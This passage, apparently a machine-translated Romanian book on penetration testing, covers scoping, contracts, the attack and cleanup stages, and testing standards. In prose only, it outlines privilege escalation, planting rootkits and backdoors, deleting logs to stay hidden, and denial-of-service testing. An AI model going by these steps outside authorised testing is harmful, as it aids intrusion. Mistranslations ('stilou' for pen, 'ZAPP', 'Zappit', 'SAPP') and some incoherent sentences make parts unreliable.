În acest fel, nu sunteți acuzat că stocați informațiile lor pe sistemele dvs.
Tehnologia se schimbă rapid. Dacă ar pune laptopul deoparte timp de cinci sau șase
ani, acel laptop ar putea fi învechit.
Prin urmare, puteți, de asemenea, să sfătuiți clientul să scoată hard disk-urile din computer
și să le stocheze numai pe acestea și să vă asigurați că datele sunt stocate într-o
locație extrem de sigură.
Veți avea o listă de ce solicită clientul și acele informații
pe care le adunați în timpul procesului de interviu, astfel încât să vă asigurați că
le abordați în cele din urmă.
Veți revizui împreună cu clientul sau departamentul ceea ce trebuie testat,
cum ar fi servere, stații de lucru, routere, firewall-uri, dispozitive de rețea, baze de date,
aplicații, securitate fizică, telecomunicații, sisteme de voce și așa mai
departe.
De asemenea, va trebui să creați o listă de verificare a cerințelor. Adică ceea ce
vă cere clientul să faceți cu acele teste specifice. De asemenea, trebuie să
specificați sectoarele de testat și să organizați utilizatorii.
De exemplu, s-ar putea să fie nevoie să vă uitați doar la anumite departamente, cum ar fi
departamentul IT. Veți anunța oamenii din acele departamente că
ceva s-ar putea întâmpla în săptămâna viitoare sau cam așa ceva.
De asemenea, va trebui să vă identificați intervalele de timp, dar trebuie să vă asigurați că este
intervalul de
timp cerut de client. Nu este ceea ce crezi că este cel mai bine, decât dacă
îți cer un sfat.
De asemenea, doriți să vă asigurați că dezvoltați un plan de urgență dacă întâlniți
o situație în care un atacator real rău intenționat și-a făcut loc.
Ce faceți în acele situații?
Ei bine, va trebui să vă asigurați că toate informațiile sunt susținute în siguranță
înainte de a începe să faceți ceva, deoarece unele lucruri pe care le-ați putea face
ar putea aduce modificări fișierelor originale.
De asemenea, va trebui să decideți formatul pe care îl veți utiliza pentru
raportare. Se face într-un document standard Word? Au nevoie de el în PDF?
Ce informații trebuie să vadă, ar trebui să fie afișate în funcție de cine se
uită la raport?
De exemplu, poate că managerul departamentului IT nu vrea să vadă toate
detaliile a ceea ce s-a întâmplat. Trebuie doar să vadă lucrurile de care trebuie să
aibă grijă și cine este implicat în transmiterea raportului.
Trebuie să fii precaut aici pentru că de multe ori când ataci munca
unui profesionist IT și prezinți raportul într-un mod constructiv,
în loc să bată joc și să fie o formă autentică.
Profesionist în securitate care emite acest raport trebuie să fie conștient de faptul că
ar putea apărea o anumită ură și vă place sau nu, ar trebui să
raportați întotdeauna totul.
Pentru a urmări toate acestea, trebuie să începeți să faceți liste. Iată câteva lucruri
pe care le puteți include pe lista dvs. de verificare; aspectul rețelei sau subrețelele,
ce intervale folosesc, uitați-vă la securitatea fizică atât a serverelor, cât și a
dispozitivelor de rețea, dar și a clădirii în sine.
De exemplu, poate cineva să intre în birou și să găsească o
mufă RJ45 goală? De asemenea, nu uitați, nu doar cu aspectul rețelei, ci asigurați-vă că le
învățați pe ambele; adresele IP externe și interne.
Uitați-vă la dispozitivele de rețea, cum ar fi routere, comutatoare, firewall-uri,
puncte de acces wireless, controlere LAN fără fir. Câte dintre acestea
au fiecare mașină? Includeți, de asemenea, dispozitive finale, cum ar fi
dispozitivele gazdă fără fir și cu fir, cum ar fi laptopurile și computerele.
Aș include, de asemenea, imprimante și scanere, camere CCTV,
mecanisme de securitate pentru intrarea ușilor, dispozitive pentru săli de ședințe, cum ar fi
proiectoare și IPTV-uri,
telefoane IP și telefoane IP pentru conferințe sau chiar dispozitive mobile, cum ar fi
telefoanele mobile, tabletele sau chiar Apple sau Ceasuri Android, orice este conectat
la rețea.
Au nevoie de o hartă a prezenței lor pe internet? Arătați-le ce este accesibil
din exterior și dacă aceste mașini sunt conectate atât extern, cât și
intern, veți dori adresele ambelor părți pe listă. Cum rămâne cu sistemul de operare în
rețea?
Dacă faceți un test pe stilou și au cinci sau mai puține servere, de exemplu,
servere Windows sau Linux, ar trebui să verificați mai multe servere și, dacă da,
câte de fiecare tip?
De asemenea, ar trebui să vă asigurați că le puteți identifica. Are clientul
nevoie de o evaluare a rețelelor fără fir sau a sistemelor lor analogice, precum și a
mașinilor lor mobile, mai ales dacă organizația desfășoară o
forță de muncă mobilă?
Dar aplicațiile și serviciile web oferite de client? Dacă
acel client are un site web frontal, are link-uri de redirecționare pentru a vizita alte
site-uri sau atrage conținut din alte surse pe site-ul său?
Unele atacuri vizibile de malware și ransomware sunt cauzate în prezent de
rețelele publicitare. Acestea sunt rețele care oferă reclame. Acestea sunt rețele publicitare
care legitimează site-uri, dar oamenii doar se abonează la ele, iar un
atacator rău intenționat creează o reclamă și este doar HTML cu un amestec de
JavaScript, care nu este altceva decât un spațiu de cumpărare în interiorul unei rețele
publicitare.
Aceste rețele publicitare sunt folosite de sute de site-uri web, iar oamenii nu au idee
că ar putea oferi cod rău intenționat atunci când accesați acele site-uri.
Mergând mai departe, veți dori, de asemenea, să vă asigurați că definiți domeniul de aplicare al
pentestului
. Acestea vor include rezultatele, adică care este lista de
rapoarte care vor fi disponibile după ce ați terminat testul.
De asemenea, ar trebui să includeți definițiile datelor sau forma pe care o
vor lua rezultatele testului. De asemenea, veți dori să definiți funcționalitatea, verificarea
dacă sistemul funcționează conform așteptărilor și structura tehnică care
ar putea include diagrame de flux pentru a arăta procesele și pașii prin care ați trecut
.
Există un lucru de care vrei să fii îngrijorat și este ceva pe care vrei
să-l explici clientului. Dacă testul pen-test durează ceva timp, în acest
interval de timp, modificările pot fi încorporate în rețeaua lor fără
știrea pentesterilor și, de obicei, clientul nu înțelege impactul acestor
modificări.
Înainte de a face modificări în timpul perioadei de testare a pen-testului, acestea ar putea
fi revizuite sau trimise responsabilului de angajament de la compania de testare a pen-ului,
astfel încât
acesta să poată explica efectele modificărilor pe care urmează să le facă.
Unele dintre aceste modificări includ orice modificări ale procesului de afaceri sau orice
modificări tehnice, cum ar fi dacă compania își mută locația. De asemenea, dacă există
aplicații care s-ar fi putut schimba. Aici, nu mă refer la
actualizări ale unei aplicații existente, ci mă refer la trecerea la
aplicații complet diferite.
Mergând mai departe, când se ia în considerare domeniul de aplicare al pen-testului, echipa de
testare
ar trebui să se uite la securitatea software-ului sistemului sau la securitatea și
configurarea.
Ar trebui să se uite și la vulnerabilitățile bazate pe software și sistem. Vrei
să te uiți la securitatea rețelei, la toate componentele diferite ale rețelei
și la configurația acestora. De exemplu, există valori implicite care sunt încă în
joc? De asemenea, va trebui să vă uitați la securitatea aplicației pe partea client.
Echipa de testare ar trebui să verifice aplicația de la parte client pentru securitate și
conformitate, precum și securitatea de la parte de la client la partea de server, deoarece datele
se transmit de la client la server.
Cum este securizat acest trafic și, din moment ce ați
verificat traficul de la client la server, doriți să vă uitați și la securitatea pe partea serverului.
Prin urmare, vă veți
uita la ambele; aplicațiile web și aplicațiile în sine rulează
pentru defecte.
În domeniul de aplicare,
va trebui să implementați metode de inginerie socială pentru a încerca să vedeți dacă puteți
aduna și câteva parole sau detalii despre proiect. Domeniul de aplicare ar trebui
să includă, de asemenea, documentarea securității existente.
Mai mult, vrei să te gândești în ce mod distrug angajații
documente care nu mai sunt folosite? Un lucru pe care ar trebui să-l subliniați este
utilizarea dispozitivelor de mărunțire.
De asemenea, va trebui să evaluați securitatea comunicațiilor aplicației pentru orice
interceptări neautorizate. În acest domeniu, va trebui să vă uitați
și la securitatea fizică, deoarece organizația ar trebui să restricționeze accesul fizic
doar la departamentele care sunt relevante pentru utilizarea acelor sisteme.
Multe companii angajează companii de distrugere pentru a participa la fața locului și a-și
arunca
documentele, dar informațiile ies în continuare prin coșul de gunoi obișnuit, așa că doriți
să vă asigurați că înțeleg că acesta este unul dintre vectorii care pot fi
folosiți împotriva lor.
De asemenea, ar trebui să verificați dacă există angajați nemulțumiți care ar putea elibera
date confidențiale sau le-ar putea duce cu ei unui concurent. Unul dintre celelalte
lucruri grozave pe care le puteți revizui împreună cu clientul este sabotarea confuziei intrușilor.
De multe ori, companiile vor implementa strategii precum o oală cu miere pentru a
deruta sau chiar a induce în eroare intrușii. Ei ajung să-și petreacă timpul crezând
că acel vas cu miere este autentic.
În calitate de pen-tester, doriți să vă asigurați că le testați dacă le au pe acestea
. De asemenea, doriți să testați în domeniul de aplicare al răspunsului. De exemplu
, care este răspunsul adecvat pentru fiecare tip de incident.
În continuare, trebuie să te uiți la contracte. Aici, doriți să vă asigurați că
documentele dvs. vor include acordul dvs. de nedezvăluire. Acest lucru este pentru
a vă asigura că protejați informațiile companiei.
De asemenea, ar trebui să fii clar cu privire la taxe și grafice, mai ales dacă proiectul
depășește programul estimat pentru că s-ar putea să dai peste
ceva care nu a fost prevăzut.
De asemenea, va trebui să aveți un document cu informații sensibile. Acestea includ
informații care sunt legate de activele electronice ale companiei, aplicațiile care
sunt în prezent în curs de dezvoltare sau orice altceva de natură sensibilă care este
solicitat de echipa de testare.
De asemenea, ar trebui să includeți un contract de informații confidențiale. Aici veți
include informații despre secrete comerciale, informații despre rețea,
informații despre sistemul telefonic, date despre clienți sau alte materiale comerciale.
Acest tip de informații sunt furnizate pen-testerului și acesta este un alt
motiv pentru care am menționat mai devreme că recomand compania să vă furnizeze
un laptop care este proprietatea lor, astfel încât să nu fie nevoiți să vă faceți griji că decolați
cu unele dintre ele. informațiile lor confidențiale.
De asemenea, contractul trebuie să menționeze că nu veți dezvălui sau oferi copii
niciunui terț sau concurent. Acest lucru vă ajută să stabiliți un nivel de încredere între dvs. și
companie, deoarece sunteți pe cale să îi atacați și să vedeți dacă puteți fura
informații.
Următorul punct de pe listă este clauza de despăgubire. Acest lucru îl protejează pe pentester
de orice răspundere juridică sau financiară. Se întâmplă uneori ca
testul stiloului să aibă ca rezultat pierderi sau daune ale activelor companiei.
Ar trebui să aveți, de asemenea, în secțiunea de raportare a contractului și responsabilități.
Acesta ar trebui să fie un ghid care precizează metodologia pentru efectuarea testului
și modul în care veți raporta acele proceduri.
Următorul element din faza de pre-atac este colectarea de informații. Acest lucru
se poate face în câteva moduri diferite. Puteți, de exemplu, să utilizați
recunoașterea pasivă, uitându-vă la înregistrările publice.
Ați putea să căutați puțin pe Google pe companie sau orice altceva care nu este
prea agresiv. Sau, ați putea face și opusul, făcând o
supraveghere activă agresivă.
De asemenea, trebuie să faceți niște profiluri web. Profilarea web înseamnă că puteți obține
o structură de directoare a serverelor web sau serverelor FTP și puteți cataloga toate
formularele bazate pe web, tipurile de intrare de utilizator permise,
destinațiile de trimitere a formularelor.
Dar, ar trebui să catalogați și mesajele de eroare care apar, deoarece acestea vă pot
ajuta la identificarea linkurilor și aplicațiilor terță parte. După cum vedeți, lista este lungă
și petreceți mult timp în această etapă specială și asta pentru că aceasta este
ceea ce vă ajută să le acoperiți pe ambele; dvs. și clientul, deci există un nivel de
așteptare care trebuie îndeplinit.
Capitolul 6 Testarea stiloului @ Etapa 2
Testarea stiloului Etapa 2 este etapa de atac. Toate informațiile pe care le adunați în timpul
etapei pre-atac vă ajută să găsiți o strategie de atac amănunțită.
Etapa de atac presupune compromiterea țintei.
S-ar putea să urmăriți o exploatare a vulnerabilității pe care ați descoperit-o în timpul
etapei de pre-atac sau chiar să utilizați unele lacune precum politici de securitate slabe sau
politici de parole pentru a încerca să obțineți acces la sistem.
Este important de reținut că atacatorul trebuie să-și facă griji doar cu privire la un port de
intrare sau un mecanism de intrare, prin urmare clientul sau compania trebuie
să-și facă griji să-și acopere toate bazele.
În loc să fii pasiv, trebuie să devii activ. Odată ce contractul este
finalizat și aveți permisiunea de a vă angaja, mai întâi ar trebui să încercați să pătrundeți
în perimetru, uitându-vă la mașinile care sunt expuse extern și la modul în care
reacționează.
Apoi, ar trebui să vedeți cum să enumerați acele ținte după ce v-ați îndreptat
. În cazul în care știți care este ținta, va fi mai ușor să încercați să
o atingeți.
După ce ați atins ținta, următorul lucru pe care trebuie să-l faceți este să vă puteți escalada
privilegiile, astfel încât să puteți face mai multe cu acel anumit sistem. În cele din urmă,
va trebui să vă asigurați că puteți intra înapoi în sistem prin executarea,
implantarea și retragerea, folosind rootkit-uri.
Să intrăm în detalii despre cum ați face fiecare dintre aceste elemente. Principalele
modalități de testare a perimetrului sunt urmărirea paravanului de protecție în sine și
veți face acest lucru prin trimiterea și crearea unor pachete pentru a verifica cum
reacționează paravanul de protecție.
Acest lucru se poate face analizând modul în care firewall-ul gestionează fragmentarea,
fragmentele suprapuse, inundațiile de pachete.
De asemenea, puteți face acest lucru prin crearea unor pachete, astfel încât să puteți verifica
listele de acces sau ACL-urile paravanului de protecție, cum ar fi ceea ce este permis și ce nu.
Tehnic, ce este permis și ce este refuzat. Ar trebui să aruncați o privire și
asupra modului în care protocoalele sunt filtrate încercând să vă conectați la diferite
protocoale,
cum ar fi SSH, FTP sau chiar Telnet.
De asemenea, trebuie să încercați să măsurați pragurile pentru diferite
atacuri de denial of service, încercând să trimiteți conexiuni TCP persistente și să vedeți cum
se ocupă firewall-ul sau chiar încercând să transmiteți conexiuni UDP.
Făcând acest lucru, veți afla care sunt pragurile setate la firewall. De asemenea, ar trebui să
încercați
să trimiteți niște URL-uri incorecte pentru a vedea cum răspunde IDS-ul.
De asemenea, puteți încerca să vedeți cum răspund serviciile web la unele solicitări, cum ar fi
cererea de postare, solicitările de ștergere sau solicitările de copiere. Apoi, trebuie să mergeți
după
enumerarea mașinilor.
Scopul enumerarii mașinilor este de a afla cât mai multe informații despre
gazdă. Este posibil să fi descoperit ceva în timpul
mediului de pre-test, dar faza de atac te activează.
Dar unele dintre acele perimetre pe care le veți descoperi ar putea fi lucruri
precum: care este ID-ul mașinii sau care este descrierea mașinii, iar acestea
vă vor ajuta să identificați unde sunt amplasate fizic mașinile.
De asemenea, va trebui să faceți un inventar al accesibilității la rețea a acestor
mașini. După ce ați enumerat mașinile, următorul pas este
obținerea țintei.
Acest lucru se datorează faptului că știți totul din rețea sau cel puțin o
bucată decentă din ea. Pe baza a ceea ce ai descoperit, poți urmări acele
vulnerabilități.
Unele modalități prin care puteți obține mai multe informații despre țintă sunt prin
sondarea atacurilor. Acest lucru înseamnă că veți viza acele mașini pe care le-ați
descoperit cu diferite tipuri de atacuri pentru a vedea care sunt vulnerabile.
Prin urmare, trebuie să executați scanări de vulnerabilități. De asemenea, trebuie să obțineți
ținta făcând ceva de bază, cum ar fi utilizarea a ceea ce este cunoscut sub numele de sisteme
de încredere.
Aceasta implică încercarea de a accesa resursele dispozitivului prin informații pe care le-ați
obținut în mod legitim prin atacuri de inginerie socială.
După ce ați dobândit ținta, următorul pas este să escaladați privilegiile.
Uneori, această escaladare este efectuată de atacator, așa că pentru a realiza acest lucru,
tu, ca tester, ar trebui să încerci să profiti de erori și defecte în
proiectarea sistemului de operare sau a aplicațiilor.
Poate chiar configurări greșite pe un sistem de operare sau încercați să ridicați
accesul la o aplicație a unui utilizator normal la cineva cu permisiuni mai mari.
În mod normal, escaladarea privilegiilor este efectuată de atacatori pentru a desfășura diferite
tipuri de activități, cum ar fi ștergerea fișierelor, analizarea informațiilor sensibile sau
instalarea de programe care îi pot ajuta să intre mai târziu, cum ar fi un troian sau un
virus.
Acestea sunt numite tehnic uși din spate. Unele modalități prin care vă puteți escalada
privilegiile includ politicile de securitate slabe sau profitarea de e-mailuri sau
codificarea site-urilor web care nu a fost testată pentru a vedea dacă puteți aduna informații
care ar putea duce la o escaladare a privilegiilor.
O poți face și prin atac cu forță brută. Forța brută
consumă mai mult timp și există numeroase instrumente, cum ar fi
spargerea parolelor, troienii sau chiar ingineria socială.
Ingineria socială este una dintre modalitățile cele mai ușoare și preferate pentru atacatori,
deoarece este greu de urmărit. După ce ați escaladat privilegiile
unui cont, următorul lucru pe care trebuie să-l faceți este să încercați să executați, să
implementați și
să retrageți.
Unele sisteme sunt vulnerabile la atacurile de tip denial of service sau
la depășirile de buffer și la unii viruși vechi, cum ar fi rootkit-urile, troienii și programele
malware. Dacă
puteți stabili un rootkit sau un troian care poate duce la accesarea mai multor
informații sau mai multe resurse de sistem, trebuie să vedeți dacă vă puteți acoperi
urmele ștergând fișierele jurnal sau ascunzând modificările pe care le-ați făcut.
În calitate de pen-tester, trebuie să vă asigurați că puteți modifica
setările sistemului și că rămâneți ascuns. Deci vrei să vezi dacă poți fi detectat
sau nu.
Odată ce ați făcut toate acestea, trebuie să vă asigurați că puteți intra din nou prin
ușa din spate și să vedeți dacă există alerte, cum ar fi alerte prin e-mail, că
inginerii ar fi putut fi primiți sau avertizați.
Capitolul 7 Testarea stiloului @ Etapa 3
Dacă credeți că pașii de pre-atac sau pașii efectivi de atac sunt cei mai
importanți, ei bine, nu este adevărat din punct de vedere tehnic. Cei mai critici pași sunt în
etapa post-atac pentru că faci asta, din punct de vedere ofensiv.
Este responsabilitatea pen-testerului să-și curețe mizeria. Va trebui
să vă asigurați că reveniți sistemele la starea lor pre-testare.
Nu faci doar mizerie și pleci. Prin urmare, ar trebui să eliminați toate
fișierele pe care le-ați încărcat, orice date pe care le-ați modificat; vă veți
asigura că le restabiliți, precum și toate setările pe care le-ați
modificat.
Acesta este, de asemenea, unul dintre motivele pentru care este vital să documentezi fiecare
pas pe parcurs
. De asemenea, trebuie să anulați orice privilegii sau setări de utilizator dacă ați făcut vreo
escaladare a privilegiilor.
De asemenea, trebuie să vă asigurați că restabiliți rețeaua la care ați făcut modificări
fie în DNS, fie în orice adrese IP. În rezumat, trebuie să recreați
aceeași stare de rețea ca și înainte de a intra.
Dacă ați intrat în registru în orice fel pe orice sistem,
trebuie să vă asigurați că le reveniți și pe aceleași setări.
Uneori s-ar putea chiar să creați diferite partajări și conexiuni, așa că trebuie să
le anulați și, de asemenea, va trebui să vă asigurați că documentați toate jurnalele
care au fost capturate, precum și intrările care au fost modificate.
După aceea, va trebui să analizați rezultatele și, în loc să creați probleme,
trebuie să dezvoltați soluții. Odată ce ați făcut toate acestea, trebuie să
prezentați acea documentație clientului dvs., în timp ce trebuie să identificați
sistemul critic și resursele critice care sunt în pericol și să veniți cu o
listă prioritizată a ceea ce trebuie modificat mai întâi.
Capitolul 8 Standarde de testare a penetrației
Diferitele moduri în care faceți testarea pen-ului vor depinde de metodologia
pe care decideți să o utilizați. Există multe standarde acolo. Să acoperim câteva
dintre acestea, astfel încât să puteți afla care dintre ele vi se potrivește cel mai bine.
Să începem mai întâi cu OSSTMM, care înseamnă Open Source Security
Testing Methodology Manual. Acest set standard de teste de penetrare încearcă
să obțină o matrice de înaltă securitate.
În rezumat, acesta este considerat a fi standardul pentru un nivel cel mai înalt de
testare. Mai există unul numit OWASP, care înseamnă Open Web
Application Security Project.
OWASP este o metodologie open-source, include numeroase instrumente care
vă pot ajuta foarte mult și are, de asemenea, o bază de cunoștințe, precum și un instrument
care se
numește ZAPP sau Zed Attack Proxy Project.
ZAPP este un instrument care vă poate ajuta automat să găsiți vulnerabilități în
aplicațiile web. ZAPP este conceput pentru dezvoltatorii web, dar testerii de stilouri pot folosi
și acest instrument.
Există și un alt cadru numit ISSAF, care este
Cadrul de evaluare a securității sistemului informațional. ISSAF este, de asemenea, un proiect
open-source
despre cum să desfășoare un pen-test. ISSAF este susținută de un grup numit
grupul de securitate a sistemului informațional public.
Un alt standard la care ar trebui să te uiți se numește NIST, care înseamnă
Institutul Național de Standarde și Tehnologie. Când vine vorba de NIST,
ar trebui să știți că agenția federală de tehnologie lucrează cu industria pentru a
dezvolta și aplica tehnologii, măsurători și standarde.
Avem, de asemenea, LPT, care înseamnă EC-Council's License Penetration
Tester. Aceasta este o metodologie proprietară și mai există una de la
McAfee, care se numește Foundstone și are și ISS, care este realizată de
IBM.
Când vine vorba de IBM, ei își fac testele pentru tine. Aveau și un
produs bazat pe semnătură numit Proventia, care acum este întrerupt. Acesta
a fost un dispozitiv de securitate multifuncțional și a oferit numeroase
servicii diferite pentru a vă asigura sau testa mediul de rețea.
Același lucru este valabil și pentru McAfee și Foundstone. Este deținut din punct de vedere
tehnic
de Intel. Cu LPT-ul EC-Consiliu, examinatorul trebuie să treacă prin
numeroși pași diferiți, similar cu CEH.
Trebuie să parcurgeți un curs, să treceți printr-un proces de aplicare, care include o taxă de 900
USD, iar aceștia vă vor oferi acces la mediul
Aspen al Consiliului EC . Ei fac un test de stilou într-un mediu de testare și au 30 de zile pentru
a-și transmite raportul Consiliului CE. Cu fiecare dintre acestea, fie că este vorba de versiunile
open-source sau proprietare ale acestor metodologii, toate sunt similare una cu alta. Fiecare
dintre metode vă va ajuta să vă acoperiți toate bazele. Toate încep cu o etapă de colectare a
informațiilor, despre care am vorbit mai devreme. Totul este să ieși în oraș și să găsești cât
mai multe informații despre țintă sau companie, fie că provin din surse publice, ziare, articole
de pe internet, bloguri sau surse de date terțe. Apoi, trebuie să treceți printr-un test de stilou
extern și căutați vulnerabilități care sunt accesibile din exterior. Apoi, veți analiza o analiză a
vulnerabilităților, astfel încât să puteți găsi punctele slabe pe baza software-ului, sistemelor de
operare sau mașinilor. După aceea, ai face un test intern de penetrare a rețelei pentru a vedea
ce tip de informații sunt expuse din interior. Apoi treceți prin testarea deschisă a firewall-ului.
Aceasta este linia ta principală de apărare față de lumea exterioară, dar ai face și teste din
DMZ. Ca o notă secundară, DMZ înseamnă Zona Demilitarizată, uneori denumită o rețea
perimetrală sau o subrețea ecranată. Apoi, trebuie să verificați dacă IDS face ceea ce ar trebui
să facă, care detectează intruziunile. În calitate de pen-tester, veți căuta să vedeți dacă vreo
vulnerabilitate ar permite atacatorului să ocolească setările alarmelor care sunt configurate pe
aceste sisteme. În continuare, metodele de spargere a parolelor pot fi utilizate pentru a
identifica punctele slabe asociate cu gestionarea parolelor. Acest lucru vă ajută să vă asigurați
că nu sunteți predispus la atacuri de forță brută, atacuri hibride sau atacuri de dicționar.
Aceste metodologii vă asigură, de asemenea, că acoperiți pentesturile de inginerie socială .
Aceste tipuri de experimente pot fi realizate fie prin utilizarea metodelor bazate pe oameni, fie
prin inginerie socială cu computere, determinând pe cineva să deschidă un atașament de e-
mail. De asemenea, va trebui să vă acoperiți uitându-vă la testele de stilou pentru aplicații web.
Veți căuta vulnerabilități legate de cod sau de back-end. Cel mai probabil, unele teste mai
celebre includ SQL pen-test. Injecția SQL este încă dominantă astăzi. Acesta profită de
variabilele de intrare nevalidate care sunt transmise prin comenzi SQL prin aplicația web care
se execută în baza de date back-end. În funcție de locul în care ați plasat routerele în rețea și
comutatoarele dvs., acestea transmit pachete de date de la un punct la altul, uneori în
interiorul și alteori în afara sistemului dvs. Dacă dai jos un router, sfârșești prin a elimina pe
toți cei care sunt conectați la internet. Când testați routere, în mod normal, o puteți face atât
de pe internet, cât și din interior. Va trebui să te uiți și la rețeaua wireless. Aici, vă veți
concentra pe disponibilitatea rețelelor wireless externe care pot fi accesate de angajații
companiei. Acest lucru ocolește din punct de vedere tehnic firewall-ul companiei, deoarece
wireless nu poate fi reținut și se stinge peste tot în aer, iar noi nu îl vedem, iar semnalul poate fi
accesat din afara granițelor fizice ale locației companiei. De asemenea, veți analiza puterea
criptării și tipul de criptare implementat. De asemenea, veți continua să vă acoperiți bazele cu
aceste metodologii făcând un test de refuzare a serviciului. Vezi dacă poți dărâma rețeaua
întreprinderii sau un site de comerț electronic, inundându-l cu pachete sau atât de mult trafic
încât nu mai știe ce să facă . Când faceți un atac de tip denial of service, ceea ce căutați este
pragul în care sistemul începe să se defecteze. Ar trebui să vă gândiți cum ați gestiona
mașinile furate. De exemplu, odată ce v-ați blocat toate telefoanele și laptopurile, ar trebui să
vă gândiți și la ce se întâmplă atunci când acele aparate sunt furate. De exemplu, echipa de
testare a pen-ului poate încerca să ia echipamente mobile și să efectueze teste offline pentru a
obține acces la informațiile stocate în acele mașini offline. De exemplu, nu ar trebui să urmăriți
computerul cuiva din departamentul de vânzări, ci să încercați să vă concentrați atacul către
cineva pe care l-ați identificat ca fiind o persoană IT. Dacă puteți obține pe cineva de la
departamentul IT sau pe cineva dintr-un management superior, ei bine, acești oameni au mai
multă permisiune sau acces la mai multe sisteme decât restul angajaților. De asemenea,
trebuie să te uiți la testele de penetrare a codului sursă. Multe companii folosesc astăzi
aplicații care sunt create intern și, uneori, aceste aplicații nici măcar nu sunt considerate ca
parte a platformei de securitate. În calitate de pen-tester, veți analiza codul sursă fie manual,
fie există numeroase instrumente care vă pot ajuta, cum ar fi Zappit. În acest tip de testare,
echipa de testare va încerca să aibă acces la facilități înainte, în timpul și după orele de lucru,
dar nu trebuie să facă nimic distructiv . De exemplu, nu spargi geamuri, dar dacă poți strânge
cu ușurință încuietoarea, sau poți dezasambla poarta sau să sari turnichete, e bine cu multe
companii. Unele companii sunt puțin speriate de acest tip de testare, așa că un alt lucru pe
care ar trebui să-l faceți este să faceți detalii pentru a oferi companiei o perspectivă obiectivă a
controalelor de securitate care sunt în prezent în vigoare și a modului în care acestea ar putea
fi ocolite. În mod similar, verificați dacă compania are camere? Dacă da, doriți să înțelegeți
dacă funcționează cu o interfață web. Care sunt unghiurile lor de vizualizare? De exemplu,
puteți utiliza o dronă pentru a zbura într-o zonă pentru a privi în partea de sus a camerei pentru
a privi în spatele camerei fără a fi detectat. În rezumat, puteți vedea cât de multă mișcare este
permisă înainte ca camera să pornească sau unde este vizibilitatea camerei. De asemenea, va
trebui să vă asigurați că vă uitați la bazele de date. Aici veți încerca să accesați direct datele
conținute în baza de date, încercând să utilizați unele metode de spargere a parolelor. De
asemenea, puteți încerca să faceți un atac standard de injecție SQL, dar nu și baze de date
bazate pe SQL. De asemenea, va trebui să vă uitați la scurgerile de date. Aici, trebuie să
înțelegeți dacă datele pe care le descoperiți conțin vreo proprietate intelectuală, date private
sau sensibile. Acest test special ar trebui să încerce să ajute compania să împiedice
informațiile confidențiale să iasă pe piață sau către concurenți. Prin urmare, ar trebui să
verificați cine are acces la acele fișiere? De asemenea, ar trebui să încercați să îmbunătățiți
gradul de conștientizare în rândul angajaților cu privire la cele mai bune practici. Acest lucru
este mai direcționat, dar dacă compania folosește o platformă SAPP, puteți implementa un
pen-test pentru a vedea dacă a fost corectat corect. Aceasta este, astfel încât să puteți afla
dacă există vulnerabilități pe care un atacator le- ar putea utiliza, deoarece SAPP conține o
mulțime de informații critice pentru afaceri. O altă zonă pe care să o aruncați o privire atunci
când testați pen-ul este VPN-ul sau rețeaua privată virtuală. Majoritatea companiilor permit
unora dintre angajații lor să lucreze de la distanță fie dacă sunt pe drum, fie lucrează de acasă.
În ambele cazuri, VPN-urile creează o conexiune de încredere la rețeaua internă. Știe că pen-
testerul va încerca să obțină acces la VPN fie încercând să compromită un punct final la
distanță, fie încercând să obțină acces la tunelul VPN, astfel încât să poată obține acces în
rețea. Mai mult, ar trebui să încercați să obțineți acces la rețeaua VoIP sau Voice over IP
pentru a încerca să înregistrați conversații sau să faceți o refuz de serviciu, astfel încât să nu
poată comunica. O altă caracteristică populară este cloud-ul, așa că atunci când începeți să îl
utilizați, securitatea se bazează pe responsabilitatea comună atât a furnizorului, cât și a
clientului și există multe riscuri de securitate asociate cu cloud computing. Alte teste pe care
ar trebui să le realizați includ dispozitivele virtuale. Majoritatea companiilor folosesc deja
virtualizarea. Deoarece dispozitivul gazdă este complet corelat, nu înseamnă că VM sau
mașina virtuală este. Ceea ce s-ar putea să găsiți este că dispozitivul virtual este corectat, dar
gazda nu și, deoarece mediul virtual este o duplicare exactă a mediului fizic, suferă aceleași
probleme de securitate. Dacă VM rulează software sau aplicații, atunci este vulnerabil.
Atacatorului nu-i pasă dacă este virtual sau nu. Este doar o altă țintă. Când faceți aceste tipuri
de teste, căutați să vedeți dacă sunteți capabil să treceți printr-o tehnologie mai veche despre
care o companie a uitat. Trebuie să vedeți dacă mai există modemuri vechi care își păstrează
și parolele implicite. Modemurile se identifică prin intermediul unui banner. Indiferent dacă
este vorba despre un troian, un virus sau un ransomware, dar, de exemplu, troieni proiectați să
fure informații sensibile, să ștergă date, să înlocuiască fișierele sistemului de operare , poate
chiar să efectueze un atac de tip denial of service, să înceapă să vă urmărească cu keylogger,
să creeze uși din spate sau să ofere la distanță acces. Virușii sunt proiectați să distrugă datele,
să încetinească sistemele, să consume resurse și, de asemenea, aveți o problemă cu
ransomware. În calitate de tester de penetrare, doriți să vă asigurați că căutați orice porturi
care ar putea fi suspecte care sunt deschise. Mai mult, ar trebui să căutați orice procese sau
intrări de registru sau drivere de mașină care sunt infectate, servicii Windows sau servicii false,
ce programe au acces la rețea, cum gestionează utilizatorii sau angajații malware sau
ransomware care vin prin e-mail și așa mai departe și așa mai departe. . Un alt lucru pe care ar
trebui să îl luați în considerare atunci când vă testați pen-ul este să vă uitați la gestionarea
jurnalelor. Fișierele jurnal înregistrează cine, ce, unde, când, a tot ce se află în rețea, deci
gestionând acele fișiere jurnal, asigurându-vă că sunt plasate în locații care sunt securizate
corespunzător sau monitorizându-le pentru orice modificări. Odată ce este prea târziu, ar
trebui să testați și integritatea fișierelor. Cum se descurcă cu asta? Aici, ar trebui să vă
asigurați că niciun fișier nu este manipulat, mai ales când vine vorba de fișiere ale sistemului
de operare. Asta se referă și la malware, dar ar trebui să încercați să identificați cine a
modificat datele, care sunt atributele și cum sunt înregistrate și întreținute. Când vine vorba de
dispozitive mobile, ei bine, toată lumea are dispozitive mobile în zilele noastre. Toată lumea
vrea să fie pe mobil, iar implementările BYOD sau Bring Your Own Device devin foarte populare,
așa că trebuie să începi să monitorizezi și să verifici dispozitivele mobile ale oamenilor.
Deoarece aceste mașini portabile funcționează cu sisteme de operare diferite și aplicații
diferite, introduce noi probleme de securitate pentru noi toți. Din punct de vedere tehnic, ar
trebui să existe o singură persoană care monitorizează dispozitivele mobile în orice moment.
Am vorbit despre VoIP, dar avem și teste de penetrare pentru telecom și bandă largă. Nu
contează ce afacere în ce clădire te uiți; puteți aduna datele tuturor. Una dintre cele mai
importante moduri prin care oamenii intră în sistem este utilizarea malware și ransomware
prin e-mail, astfel încât ar trebui să vă uitați și la securitatea e-mailului. E-mailul este cea mai
folosită comunicare din lume astăzi. Dar principalul motiv pentru care este important este că
